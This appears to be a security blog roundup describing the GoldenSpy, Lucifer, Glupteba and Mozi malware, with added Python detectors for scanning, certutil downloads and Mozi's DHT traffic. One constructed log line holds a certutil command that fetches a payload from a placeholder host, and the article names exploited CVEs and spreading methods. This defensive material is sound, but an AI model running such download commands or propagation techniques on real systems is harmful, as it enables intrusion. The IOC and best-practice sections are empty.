Chinese GoldenSpy… Making companies run it…

Chinese bank forced western companies to install malware-laced tax software
GoldenSpy backdoor trojan found in a Chinese bank’s official tax software, which the bank has been forcing western companies to install.

A Chinese bank has forced at least two western companies to install malware-laced tax software on their systems, cyber-security firm Trustwave said in a report published today.

The two companies are a UK-based technology/software vendor and a major financial institution, both of which had recently opened offices in China.

“They informed us that upon opening operations in China, their local Chinese bank required that they install a software package called Intelligent Tax produced by the Golden Tax Department of Aisino Corporation, for paying local taxes.”

The “GoldenSpy” backdoor
Trustwave, which was providing cyber-security services for the UK software vendor, said it identified the malware after observing suspicious network requests originating from its customer’s network.

This backdoor, GoldenSpy, ran with SYSTEM-level access and allowed a remote attacker to connect to the infected system and run Windows commands, or upload and install other software.

Many types of software have remote-access features for debugging or support. However, Trustwave said it also identified features that are more commonly found in malware and have no legitimate use.

GoldenSpy installs two identical versions of itself, both as persistent autostart services. If either stops running, the other will respawn it.

GoldenSpy operates with SYSTEM level privileges, making it highly dangerous and capable of executing any software on the system. This includes additional malware or Windows administrative tools to conduct reconnaissance, create new users, escalate privileges, etc.


But despite spotting the hidden backdoor inside the Aisino Intelligent Tax Software, Trustwave wasn’t able to determine how it got there.

Trustwave said it wasn’t able to determine if the backdoor was developed by China’s government hackers, secretly added by one of the bank’s rogue employees, or created by someone at Aisino Corporation.

It was also unclear whether Chinese intelligence might have forced the bank or the Aisino Corporation into adding the malware to their official software so they could spy on a foreign company, or whether this was an incident in which hackers were purely interested in their own financial gain.

But while some questions remain unanswered, in the meantime, Trustwave is sounding the alarm for any other company doing business in China that has installed the same software.

Lucifer Malware Propels

A new devilish malware is targeting Windows systems with cryptojacking and DDoS capabilities.

Security experts have identified a self-propagating malware, dubbed Lucifer, that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.

The never-before-seen malware initially tries to infect PCs by bombarding them with exploits in hopes of taking advantage of an “exhaustive” list of unpatched vulnerabilities. While patches for all the critical and high-severity bugs exist, the various companies impacted by the malware had not applied the fixes.

Lucifer is a new hybrid cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms.

The vulnerabilities targeted by Lucifer include Rejetto HTTP File Server (CVE-2014-6287), Oracle WebLogic (CVE-2017-10271), ThinkPHP RCE (CVE-2018-20062), Apache Struts (CVE-2017-9791), the Laravel framework (CVE-2019-9081), and Microsoft Windows (CVE-2017-0144, CVE-2017-0145, and CVE-2017-8464).

After successfully exploiting these flaws, the attacker connects to the command-and-control (C2) server and executes arbitrary commands on the vulnerable device, researchers said. These commands include performing a TCP, UDP or HTTP DoS attack. Other commands allow the malware to drop an XMRig miner and launch cryptojacking attacks, collect interface information, and send the miner status to the C2.

The malware is also capable of self-propagation through various methods.

It scans for open instances of TCP port 1433 or Remote Procedure Call (RPC) port 135. If either of these is open, the malware attempts to brute-force the login using a default administrator username and an embedded password list (the full list of passwords used can be found in Unit 42’s analysis). Upon successful authentication it copies and runs the malware binary on the remote host.

In addition to brute-forcing credentials, the malware leverages exploitation for self-propagation. If the Server Message Block (SMB) protocol (a network file sharing protocol) is open, Lucifer runs several exploit tools: EternalBlue, EternalRomance and the DoublePulsar backdoor.

Once these three exploits have been used, the certutil utility is then used to propagate the malware. Certutil.exe is a command-line program, installed as part of Certificate Services, that can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates.
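The propagation behaviour just described leaves two cheap signals a defender can look for: one host probing many others on 1433/135/445, and certutil.exe being handed a URL. This is an added example of mine, not code from the article or from Unit 42; the log formats, port set, threshold and the sample lines are all constructed assumptions.

```python
# Added example (mine, not from the article or Unit 42): a small detector for the
# two Lucifer propagation behaviours described above, run over constructed log
# lines. The log formats, port set and threshold are assumptions.
from collections import defaultdict

SCAN_PORTS = {1433, 135, 445}  # MSSQL, RPC and SMB, the ports named above
SCAN_THRESHOLD = 4             # distinct destinations before we call it a scan

# Constructed firewall log lines: "timestamp src dst dport action"
NET_LOG = """\
2020-06-10T10:00:01 10.0.0.5 10.0.0.10 1433 allow
2020-06-10T10:00:01 10.0.0.5 10.0.0.11 1433 deny
2020-06-10T10:00:02 10.0.0.5 10.0.0.12 135 deny
2020-06-10T10:00:02 10.0.0.5 10.0.0.13 445 allow
2020-06-10T10:00:03 10.0.0.5 10.0.0.14 135 deny
2020-06-10T10:00:04 10.0.0.7 10.0.0.20 443 allow
2020-06-10T10:00:05 10.0.0.7 10.0.0.10 1433 allow
""".splitlines()

# Constructed process-creation log lines: "timestamp host image args..."
PROC_LOG = r"""
2020-06-10T10:01:00 WS01 C:\Windows\System32\certutil.exe -urlcache -f http://203.0.113.9/update.bin update.bin
2020-06-10T10:01:05 WS02 C:\Windows\System32\certutil.exe -dump
""".strip().splitlines()

def find_scanners(lines, ports=SCAN_PORTS, threshold=SCAN_THRESHOLD):
    """Map each source that touched >= threshold distinct hosts on the propagation
    ports to the sorted hosts it probed. Denied connections count too: a scanner
    is noisy whether or not it gets in."""
    seen = defaultdict(set)
    for line in lines:
        _ts, src, dst, dport, _action = line.split()
        if int(dport) in ports:
            seen[src].add(dst)
    return {src: sorted(dsts) for src, dsts in seen.items() if len(dsts) >= threshold}

def find_certutil_downloads(lines):
    """Return (timestamp, host) for certutil.exe launches carrying a URL argument.
    Legitimate CA administration has no reason to fetch from an arbitrary web
    server, so this is a cheap, high-signal check for the propagation step."""
    hits = []
    for line in lines:
        ts, host, image, *args = line.split()
        if image.lower().endswith("certutil.exe") and any(
                a.lower().startswith(("http://", "https://")) for a in args):
            hits.append((ts, host))
    return hits
```

Both checks are deliberately format-agnostic so they can be pointed at real firewall and Sysmon/4688 exports once the field order is adjusted.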

Lucifer has been discovered in a series of recent attacks that are still ongoing. The first wave occurred on June 10. The attackers then resumed their campaign on June 11 with an upgraded version of the malware. Researchers say these updates include the addition of an anti-sandbox capability, an anti-debugger technique, and new checks for device drivers, DLLs and virtual devices.

These added capabilities show that the malware is growing in sophistication, researchers warn. They say enterprises can protect themselves with simple security measures such as applying patches and strengthening passwords.

Glupteba… Mining Malware

Glupteba creates a backdoor into infected Windows systems – and researchers think it’ll be offered to cyber criminals as an easy means of distributing other malware.

A malware campaign that creates a backdoor providing full access to compromised Windows PCs, while adding them to a growing botnet, has developed some unusual measures for staying undetected.

Glupteba first emerged in 2018 and started by gradually dropping more components into place on infected machines in its bid to create a backdoor to the system.

It is highly self-defending malware, with the cyber-criminal group behind it paying special attention to “enhancing features that enable the malware to evade detection.”

Its method of distribution is relatively simple: it’s bundled in pirated software, including cracked versions of commercial applications, as well as illegal video game downloads. The idea is simply to get as many users as possible to download compromised applications that contain the Glupteba payload.

To ensure the best possible chance of a successful compromise, the malware is gradually dropped, bit-by-bit onto the system to avoid detection by any anti-virus software the user may have installed. The malware also uses the EternalBlue SMB vulnerability to help it secretly spread across networks.

Glupteba uses a number of software exploits for privilege escalation, primarily so it can install a kernel driver the bot uses as a rootkit, and make other changes that weaken the security posture of an infected host.

Glupteba’s latest campaign is described as relatively prolific, fitting in with what appears to be the aim of compromising as many computers as possible.

Glupteba’s main activity appears to be cryptocurrency mining. But the way it creates a backdoor into compromised computers, combined with the way in which those behind it look to be attempting to create a large botnet of readily available machines, suggests that the ultimate aim is to lease it out as a means of distributing other forms of malware to victims.

The campaign is still active and attempting to recruit more machines into the botnet. The simplest way users can avoid falling victim to Glupteba is by ensuring the critical security update issued to protect against EternalBlue is installed.

Microsoft released the patch in 2017, but EternalBlue remains successful because of the significant number of Microsoft Windows systems around the world that haven’t had it installed, putting them at risk of falling victim to this and other malware.

The normal general precautions apply here as much as anywhere else: don’t run software you shouldn’t, keep everything patched, always make sure you have some sort of malware protection on your computer, and don’t download and run unauthorised software.

Mozi bot… Tricking IoT devices

The explosion of Internet of Things devices has long served as a breeding ground for malware distribution.

The explosion of Internet of Things (IoT) devices has long served as a breeding ground for malware distribution. The inability of users to patch many IoT devices has only compounded this problem, as bad actors continue to evolve tactics to leverage botnets for DDoS attacks and other malicious behaviour. Black Lotus Labs tracks malware families that present new or distinct threats to the global community, and recently began tracking a new malware family called Mozi.

Mozi evolved from the source code of several known malware families – Gafgyt, Mirai and IoT Reaper – that have been brought together to form a peer-to-peer (P2P) botnet capable of DDoS attacks, data exfiltration and command or payload execution. The malware targets IoT devices, predominantly routers and DVRs that are either unpatched or have weak telnet passwords. After a notable traffic increase in December was mistakenly attributed to other malware families by researchers, Black Lotus Labs reviewed entries in its reputation system for that timeframe, which revealed a different story. This traffic was not simply increased activity by a known family, but a new family altogether.

Black Lotus Labs findings

Since the malware family the traffic was first attributed to had not changed in some time, the increase was unexpected and led to further investigation. Upon review of these entries a pattern began to develop: each host had an HTTP server listening on a random port that served a file with “Mozi” in its name. File names such as “Mozi.m” and “Mozi.a” were seen across all of the identified hosts.

The Mozi botnet is comprised of nodes that utilise a distributed hash table (DHT) for communication, similar to the code used by IoT Reaper and Hajime. These nodes also host the Mozi.m and Mozi.a malware binary files, passed during the compromise of new hosts, on a randomly chosen port. The standard DHT protocol is commonly used to store node contact information for torrent and other P2P clients. Using DHT allows the malware to bypass the use of standard malware command and control servers while hiding behind the large amount of typical DHT traffic. This makes it harder to track and impact the control infrastructure. As a P2P botnet, Mozi implements its own custom extended DHT described later.

To enumerate the botnet, Black Lotus Labs implemented a machine learning model trained on the observed unique DHT traffic implementation utilised by Mozi. This allows us to distinguish between Mozi nodes and benign hosts, and identify the IPs suspected of participating in the botnet. When we identify a new suspected Mozi node, our software attempts to confirm the suspicion by sending messages proprietary to the malware’s p2p protocol, and looks for correctly formatted responses. When the correct response is seen, the host is validated as a member of the Mozi botnet.

A deeper look into the Mozi malware
The Mozi samples analysed are ELF binaries with versions targeted for MIPS and ARM processor architectures. Once executed, the binary forks many versions of itself renamed as ‘ssh’ or ‘dropbear’. The forked processes are responsible for setting up the DHT communications and closing ports to prevent infection by other malware. The forked processes can also set up HTTP on a randomly chosen port to host the Mozi binary.

Mozi uses a modified DHT protocol for communication. The bot initially DHT pings several nodes hardcoded in the binary to bootstrap the initial connection to the DHT network. For the nodes that respond, the bot then sends a DHT ‘find_node’ command to locate other bots on the Mozi botnet. It often takes several find_node attempts to locate an active Mozi peer.
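Because Mozi bootstraps with ordinary DHT ping and find_node queries, the first thing a defender can do is recognise KRPC datagrams at all, then count who on an IoT segment is sending them. The decoder below is an added example of mine, not code from the article or from Black Lotus Labs; it handles only the standard bencoded KRPC format, the datagrams are constructed, and Mozi’s proprietary protocol extension is not modelled.

```python
# Added example (mine, not from the article or Black Lotus Labs): a minimal
# bencode/KRPC decoder recognising the standard DHT 'ping' and 'find_node'
# queries Mozi bootstraps with, so they can be counted on segments (DVRs,
# routers) where no torrent client should speak DHT. Datagrams are constructed.

def bdecode(data, i=0):
    """Decode one bencoded value at data[i]; return (value, index after it)."""
    c = data[i:i + 1]
    if c == b"i":                                  # integer: i<digits>e
        end = data.index(b"e", i)
        return int(data[i + 1:end]), end + 1
    if c == b"l":                                  # list: l<items>e
        items, i = [], i + 1
        while data[i:i + 1] != b"e":
            v, i = bdecode(data, i)
            items.append(v)
        return items, i + 1
    if c == b"d":                                  # dict: d<key><value>...e
        d, i = {}, i + 1
        while data[i:i + 1] != b"e":
            k, i = bdecode(data, i)
            v, i = bdecode(data, i)
            d[k] = v
        return d, i + 1
    colon = data.index(b":", i)                    # byte string: <len>:<bytes>
    n = int(data[i:colon])                         # raises ValueError on junk
    return data[colon + 1:colon + 1 + n], colon + 1 + n

def classify_krpc(packet):
    """Return {'type': ..., 'q': ...} for a well-formed KRPC datagram, else None.
    Queries must carry a 20-byte node id, as BEP 5 requires."""
    try:
        msg, end = bdecode(packet)
    except (ValueError, IndexError, RecursionError):
        return None
    if end != len(packet) or not isinstance(msg, dict):
        return None
    y = msg.get(b"y")
    if y in (b"r", b"e"):
        return {"type": "response" if y == b"r" else "error"}
    q, a = msg.get(b"q"), msg.get(b"a")
    nid = a.get(b"id") if isinstance(a, dict) else None
    if y != b"q" or not isinstance(q, bytes) or not isinstance(nid, bytes) or len(nid) != 20:
        return None
    return {"type": "query", "q": q.decode("ascii", "replace")}

# Constructed datagrams in the shape of Mozi's DHT bootstrap traffic.
NODE_ID, TARGET = b"\x11" * 20, b"\x22" * 20
PING = b"d1:ad2:id20:" + NODE_ID + b"e1:q4:ping1:t2:aa1:y1:qe"
FIND_NODE = (b"d1:ad2:id20:" + NODE_ID + b"6:target20:" + TARGET
             + b"e1:q9:find_node1:t2:aa1:y1:qe")
```

Feeding UDP payloads from a packet capture through classify_krpc and tallying find_node queries per source address gives a first cut at the enumeration Black Lotus Labs describes, without needing their model.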

All the vulnerabilities targeted by the botnet are well known and are prevented by either proper patching or proper password management. Companies and individuals can follow these security best practices to help prevent these types of compromises in the future:

IOCs


Top talking botnet nodes from most recent data
